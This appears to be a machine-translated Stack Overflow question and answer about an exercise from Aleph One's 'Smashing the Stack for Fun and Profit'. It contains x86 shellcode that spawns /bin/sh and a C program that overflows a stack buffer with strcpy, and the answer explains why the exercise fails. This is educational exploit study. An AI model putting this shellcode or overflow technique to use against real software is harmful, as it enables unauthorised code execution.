使用strcpy&缓冲区溢出来执行shell代码

时间:2015-09-24 06:50:18

标签: c shell security buffer buffer-overflow

我一直在经历"粉碎筹码以获取乐趣和利润"并且在通过缓冲区溢出执行shell代码时遇到问题。

通过VirtualBox在Linux,Ubuntu 32bit上运行 使用-fno-stack-protector -ggdb -g标记的gcc编译器

我的代码与阅读相同,我不明白为什么它不起作用。 我遇到了分段错误。当我使用gbd进行调试时,它说" 0x08048268在??"我知道这意味着它无法在范围内找到地址。我不明白它为什么不能这样做。

我正在编译堆栈保护功能。

 char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
   char buffer[96];
   int i;
   long *long_ptr = (long *) large_string;
   for (i = 0; i < 32; i++)
      *(long_ptr + i) = (int) buffer;
   for (i = 0; i < strlen(shellcode); i++)
      large_string[i] = shellcode[i];
   large_string[127] = '\0';
   strcpy(buffer,large_string);
}

1 个答案:

答案 0 :(得分:2)

这是一篇旧文章,但我也引用了它。问题是你的代码“与阅读相同。”这些不是来自脚本的幻数。密切注意如何 Aleph One确定哪个值可以粉碎该程序的堆栈。

请记住,这篇文章是从1996年开始的,内核和GCC开发人员也读过这篇文章。